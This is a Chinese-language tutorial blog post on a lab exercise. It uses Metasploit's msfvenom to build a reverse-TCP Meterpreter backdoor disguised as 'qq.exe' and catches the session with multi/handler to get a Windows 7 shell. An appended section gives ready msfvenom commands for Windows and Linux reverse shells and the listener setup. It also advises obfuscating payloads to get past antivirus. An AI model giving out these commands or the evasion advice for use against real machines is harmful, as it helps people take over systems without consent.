msf生成后门拿shell

本文介绍在Kali系统利用msfvenom反弹Windows靶机shell的方法。先尝试ping通靶机,接着在Kali终端输入msfvenom -l打开payload目录,生成后门文件移到靶机,打开msfconsole监听,运行后获取Session,可查看用户和系统信息,最后获取win7的shell,但权限较低需提权。

 

0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧

kali 172.18.5.118

靶机  172.18.5.240

先尝试能不能ping通

好的可以 那我们进行下一步

0X01爱之初体验

先在kali终端输入msfvenom -l,打开payload目录

然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门qq.exe

 

 然后将生成的qq.exe移到靶机然后打开msfconsole

 使用该攻击模块监听 use exploit/multi/handler

然后设置payload

 

 

 在show options 发现还有未设置的

设置LHOSTkali地址

然后run开始监听

 

 

这时我们打开靶机qq.exe文件就能看到Kali这边获取到一个Session

输入jobs退出继续输入sessions -l查看session列表

这里有一个session列表,sessionid1

我们输入sessions -i 1,与该session交互

输入getuid查看用户信息

输入systinfo获取系统信息

输入shell即可获取win7shell

不过用这样方式拿的shell普遍都是很低的,还需提权

 

转载于:https://www.cnblogs.com/-zhong/p/10916483.html

### 使用 Metasploit 框架生成反弹 Shell 的 Payload Metasploit 是一个强大的渗透测试框架,提供了多种模块和工具用于生成后门以及模拟安全攻击。以下详细介绍了如何使用 `msfvenom` 工具生成反弹 Shell 的 Payload。 #### 生成 Windows 系统的反弹 Shell Payload 对于 Windows 系统,可以生成一个带有 Meterpreter 会话的可执行文件(`.exe`)。以下是生成命令的示例: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP地址 LPORT=目标端口 -f exe -o shell.exe ``` 这条命令的作用是生成一个基于 `windows/meterpreter/reverse_tcp` 的 Payload,其中 `-p` 指定 Payload 类型,`LHOST` 是本地监听的 IP 地址,`LPORT` 是本地监听的端口号,`-f exe` 表示输出格式为可执行文件,`-o shell.exe` 指定输出文件名[^3]。 #### 生成 Linux 系统的反弹 Shell Payload 对于 Linux 系统,可以生成一个基于 Bash 或 Python 的 Payload。以下是生成 Bash 脚本的示例: ```bash msfvenom -p cmd/unix/reverse_bash LHOST=你的IP地址 LPORT=目标端口 -f raw -o shell.sh ``` 此命令生成了一个基于 `cmd/unix/reverse_bash` 的 Payload,适用于 Unix/Linux 系统。输出格式为原始数据流(`raw`),并保存为脚本文件 `shell.sh`[^4]。 #### 配置 Metasploit Framework 监听器 生成 Payload 后,需要在 Metasploit 中配置监听器以接收反弹连接。以下是配置监听器的步骤: 1. 启动 Metasploit Console。 2. 使用以下命令加载相应的 Exploit 模块: ```bash use exploit/multi/handler ``` 3. 设置 Payload 类型与生成时一致: ```bash set payload windows/meterpreter/reverse_tcp ``` 4. 设置监听 IP 和端口: ```bash set lhost 你的IP地址 set lport 目标端口 ``` 5. 开始监听: ```bash exploit ``` 当目标系统运行生成的 Payload 时,Metasploit 将捕获反弹连接并提供交互Shell。 #### 注意事项 在进行渗透测试或学习时,必须确保拥有合法授权。未经授权的使用可能违反法律。此外,生成的 Payload 可能会被防病毒软件检测到,因此需要考虑 Payload 的混淆或编码技术以提高成功率[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值